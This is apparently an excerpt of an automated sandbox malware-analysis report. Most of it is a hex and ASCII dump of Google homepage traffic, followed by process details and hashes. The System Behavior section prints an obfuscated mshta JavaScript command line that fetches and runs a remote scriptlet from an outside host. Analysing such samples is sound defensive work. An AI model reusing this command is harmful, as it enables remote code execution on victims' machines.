                                                Set-Cookie: NID=518=vEyeC9NARuOXoJiVW6RM1sycdBdS15KGCHC-QnRF5ICTtAqUry7Ja7nidRTFfqbpgpN1gY4UvcJong00rP3awSkTYXXu3tymNFGfhI-5GmBq2HpS6gRrwcxU2KcIn2-Uu7rEiUk98g_V4eOpSbJgHUGrdbpS0uX2IAYAtVr3d1RWUs6GnosV0HO_pw32lnN8RekV; expires=Sat, 03-May-2025 07:28:03 GMT; path=/; domain=.google.com.br; HttpOnly
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Accept-Ranges: none
                                                Vary: Accept-Encoding
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                2024-11-01 07:28:03 UTC193INData Raw: 33 35 64 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68
                                                Data Ascii: 35d5<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="IE=edge" http-equiv="X-UA-Compatible"><meta http-equiv="Content-Type" content="text/h
                                                2024-11-01 07:28:03 UTC1378INData Raw: 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d
                                                Data Ascii: tml; charset=UTF-8"><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><m
                                                2024-11-01 07:28:03 UTC1378INData Raw: 39 2c 31 30 34 38 2c 34 31 33 38 2c 32 34 35 37 2c 37 32 38 2c 34 2c 32 39 33 33 2c 32 31 39 2c 34 37 33 2c 32 2c 33 38 31 2c 35 30 31 2c 32 2c 39 32 37 2c 34 39 38 2c 31 33 30 37 2c 32 31 38 38 2c 37 32 38 2c 33 38 36 2c 37 39 34 2c 32 31 35 2c 31 30 32 36 2c 31 39 32 2c 38 39 36 2c 32 2c 37 2c 31 34 39 2c 36 35 30 2c 32 34 32 38 2c 37 35 35 2c 31 37 35 35 2c 31 33 36 37 2c 31 2c 36 2c 31 37 39 2c 33 30 31 2c 31 30 39 2c 31 36 35 2c 34 35 36 2c 31 31 32 2c 31 32 35 2c 32 2c 31 35 34 2c 32 30 38 2c 31 39 31 2c 31 32 39 2c 32 36 35 2c 39 33 36 2c 39 33 36 2c 34 35 34 2c 31 2c 31 31 34 37 2c 32 35 33 2c 37 34 2c 31 2c 32 34 39 2c 31 34 35 35 2c 37 32 2c 32 33 30 2c 33 32 31 2c 34 2c 32 2c 35 38 38 2c 31 33 36 2c 39 33 2c 32 2c 32 2c 31 32 35 31 2c 32 2c 32
                                                Data Ascii: 9,1048,4138,2457,728,4,2933,219,473,2,381,501,2,927,498,1307,2188,728,386,794,215,1026,192,896,2,7,149,650,2428,755,1755,1367,1,6,179,301,109,165,456,112,125,2,154,208,191,129,265,936,936,454,1,1147,253,74,1,249,1455,72,230,321,4,2,588,136,93,2,2,1251,2,2
                                                2024-11-01 07:28:03 UTC1378INData Raw: 22 26 65 69 3d 22 2b 70 28 64 29 2c 62 2e 73 65 61 72 63 68 28 22 26 6c 65 69 3d 22 29 3d 3d 3d 2d 31 26 26 28 64 3d 71 28 64 29 29 26 26 28 65 2b 3d 22 26 6c 65 69 3d 22 2b 64 29 29 3b 64 3d 22 22 3b 76 61 72 20 67 3d 62 2e 73 65 61 72 63 68 28 22 26 63 73 68 69 64 3d 22 29 3d 3d 3d 2d 31 26 26 61 21 3d 3d 22 73 6c 68 22 2c 66 3d 5b 5d 3b 66 2e 70 75 73 68 28 5b 22 7a 78 22 2c 44 61 74 65 2e 6e 6f 77 28 29 2e 74 6f 53 74 72 69 6e 67 28 29 5d 29 3b 68 2e 5f 63 73 68 69 64 26 26 67 26 26 66 2e 70 75 73 68 28 5b 22 63 73 68 69 64 22 2c 68 2e 5f 63 73 68 69 64 5d 29 3b 63 3d 63 28 29 3b 63 21 3d 6e 75 6c 6c 26 26 66 2e 70 75 73 68 28 5b 22 6f 70 69 22 2c 63 2e 74 6f 53 74 72 69 6e 67 28 29 5d 29 3b 66 6f 72 28 63 3d 30 3b 63 3c 66 2e 6c 65 6e 67 74 68 3b 63
                                                Data Ascii: "&ei="+p(d),b.search("&lei=")===-1&&(d=q(d))&&(e+="&lei="+d));d="";var g=b.search("&cshid=")===-1&&a!=="slh",f=[];f.push(["zx",Date.now().toString()]);h._cshid&&g&&f.push(["cshid",h._cshid]);c=c();c!=null&&f.push(["opi",c.toString()]);for(c=0;c<f.length;c
                                                2024-11-01 07:28:03 UTC1378INData Raw: 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 69 66 28 61 3d 62 2e 74 61 72 67 65 74 29 7b 76 61 72 20 63 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 75 62 6d 69 74 66 61 6c 73 65 22 29 3b 61 3d 63 3d 3d 3d 22 31 22 7c 7c 63 3d 3d 3d 22 71 22 26 26 21 61 2e 65 6c 65 6d 65 6e 74 73 2e 71 2e 76 61 6c 75 65 3f 21 30 3a 21 31 7d 65 6c 73 65 20 61 3d 21 31 3b 61 26 26 28 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 62 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 29 7d 2c 21 30 29 3b 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63
                                                Data Ascii: nt.addEventListener("submit",function(b){var a;if(a=b.target){var c=a.getAttribute("data-submitfalse");a=c==="1"||c==="q"&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventListener("clic
                                                2024-11-01 07:28:03 UTC1378INData Raw: 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 61 7b 63 6f 6c 6f 72 3a 23 36 38 31 64 61 38 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 3a 68 6f 76 65 72 2c 61 3a 61 63 74 69 76 65 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 66 6c 20 61 7b 63 6f 6c 6f 72 3a 23 31 39 36 37 64 32 7d 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 36 38 31 64 61 38 7d 2e 73 62 6c 63 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 70 78 7d 2e 73 62 6c 63 20 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 70 78 20 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 6c 73 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66
                                                Data Ascii: ground:#fff;color:#000}a{color:#681da8;text-decoration:none}a:hover,a:active{text-decoration:underline}.fl a{color:#1967d2}a:visited{color:#681da8}.sblc{padding-top:5px}.sblc a{display:block;margin:2px 0;margin-left:13px;font-size:11px}.lsbb{background:#f
                                                2024-11-01 07:28:03 UTC1378INData Raw: 65 78 70 69 64 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 6b 45 58 50 49 29 29 3b 63 2b 3d 22 26 73 72 63 70 67 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 73 6e 29 2b 22 26 6a 73 72 3d 22 2b 62 28 74 2e 6a 73 72 29 2b 0a 22 26 62 76 65 72 3d 22 2b 62 28 74 2e 62 76 29 3b 74 2e 64 70 66 26 26 28 63 2b 3d 22 26 64 70 66 3d 22 2b 62 28 74 2e 64 70 66 29 29 3b 76 61 72 20 66 3d 61 2e 6c 69 6e 65 4e 75 6d 62 65 72 3b 66 21 3d 3d 76 6f 69 64 20 30 26 26 28 63 2b 3d 22 26 6c 69 6e 65 3d 22 2b 66 29 3b 76 61 72 20 68 3d 61 2e 66 69 6c 65 4e 61 6d 65 3b 68 26 26 28 68 2e 69 6e 64 65 78 4f 66 28 22 2d 65 78 74 65 6e 73 69 6f 6e 3a 2f 22 29 3e 30 26 26 28 65 3d 33 29 2c 63 2b 3d 22 26 73 63 72 69 70 74 3d 22 2b 62 28 68 29 2c 66 26 26 68 3d 3d 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61
                                                Data Ascii: expid="+b(google.kEXPI));c+="&srcpg="+b(google.sn)+"&jsr="+b(t.jsr)+"&bver="+b(t.bv);t.dpf&&(c+="&dpf="+b(t.dpf));var f=a.lineNumber;f!==void 0&&(c+="&line="+f);var h=a.fileName;h&&(h.indexOf("-extension:/")>0&&(e=3),c+="&script="+b(h),f&&h===window.loca
                                                2024-11-01 07:28:03 UTC1378INData Raw: 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2e 62 72 2f 69 6d 67 68 70 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 69 22 3e 49 6d 61 67 65 73 3c 2f 61 3e 20 3c 61 20 63 6c 61 73 73 3d 67 62 31 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 70 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 6d 61 70 73 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 6c 22 3e 4d 61 70 73 3c 2f 61 3e 20 3c 61 20 63 6c 61 73 73 3d 67 62 31 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 38 22 3e 50 6c 61 79 3c 2f 61 3e 20 3c 61 20 63 6c 61 73 73 3d 67 62 31 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 3f 74 61 62 3d 77 31 22 3e 59 6f 75 54 75 62 65 3c 2f 61 3e
                                                Data Ascii: ps://www.google.com.br/imghp?hl=en&tab=wi">Images</a> <a class=gb1 href="https://maps.google.com/maps?hl=en&tab=wl">Maps</a> <a class=gb1 href="https://play.google.com/?hl=en&tab=w8">Play</a> <a class=gb1 href="https://www.youtube.com/?tab=w1">YouTube</a>
                                                2024-11-01 07:28:03 UTC1378INData Raw: 22 3e 3c 74 72 20 76 61 6c 69 67 6e 3d 22 74 6f 70 22 3e 3c 74 64 20 77 69 64 74 68 3d 22 32 35 25 22 3e 26 6e 62 73 70 3b 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 6e 6f 77 72 61 70 3d 22 22 3e 3c 69 6e 70 75 74 20 76 61 6c 75 65 3d 22 65 6e 22 20 6e 61 6d 65 3d 22 68 6c 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 73 6f 75 72 63 65 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 68 70 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 62 69 77 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 62 69 68 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 73 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68
                                                Data Ascii: "><tr valign="top"><td width="25%">&nbsp;</td><td align="center" nowrap=""><input value="en" name="hl" type="hidden"><input name="source" type="hidden" value="hp"><input name="biw" type="hidden"><input name="bih" type="hidden"><div class="ds" style="heigh
                                                2024-11-01 07:28:03 UTC1378INData Raw: 66 28 74 79 70 65 6f 66 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 62 3d 22 32 22 3b 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 76 61 72 20 63 2c 64 2c 65 3d 5b 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 2e 36 2e 30 22 2c 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 2e 33 2e 30 22 2c 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 22 2c 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 22 5d 3b 66 6f 72 28 63 3d 30 3b 64 3d 65 5b 63 2b 2b 5d 3b 29 74 72 79 7b 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 64 29 2c 62 3d 22 32 22 7d 63 61 74 63 68 28 68 29 7b 7d 7d 61 3d 62 3b 69 66 28 61 3d 3d 22 32 22 26 26 6c 6f 63
                                                Data Ascii: f(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&loc


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:1
                                                Start time:03:27:59
                                                Start date:01/11/2024
                                                Path:C:\Windows\System32\mshta.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\MShTa "jAvasCRipT:try{try{var _10xlBOKJ=['\x44\x55\x44\x52\67\116\x39','\x73\143\162\151\x70\164\x3a\x68\x54\x74\x70\x53\x3a\x2f\x2f\160\x6c\x65\156\x69\154\x33\x32\64\x2e\x72\x65\x6e\155\x61\x72\153\56\x6f\x72\147\x2f\77\65\57'];GetObject(_10xlBOKJ[1])[_10xlBOKJ[0]]();}catch(e){}}catch(e){}close()" >nul 2>&1 >nul 2>&1&&exit
                                                Imagebase:0x7ff647290000
                                                File size:14'848 bytes
                                                MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Executed Functions

                                                  Function 000001C1782F0FC1 Relevance: .0, Instructions: 5COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000003.1693093843.000001C1782F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C1782F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_3_1c1782f0000_mshta.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                  • Instruction ID: 1584a9530ce926d4289673c4feb7f427f9d89edca45571565c5c1c8f7e63a78a
                                                  • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                  • Instruction Fuzzy Hash: E49002244D650665F41412910C4569C60406389251FD445904817A0186D94D42969152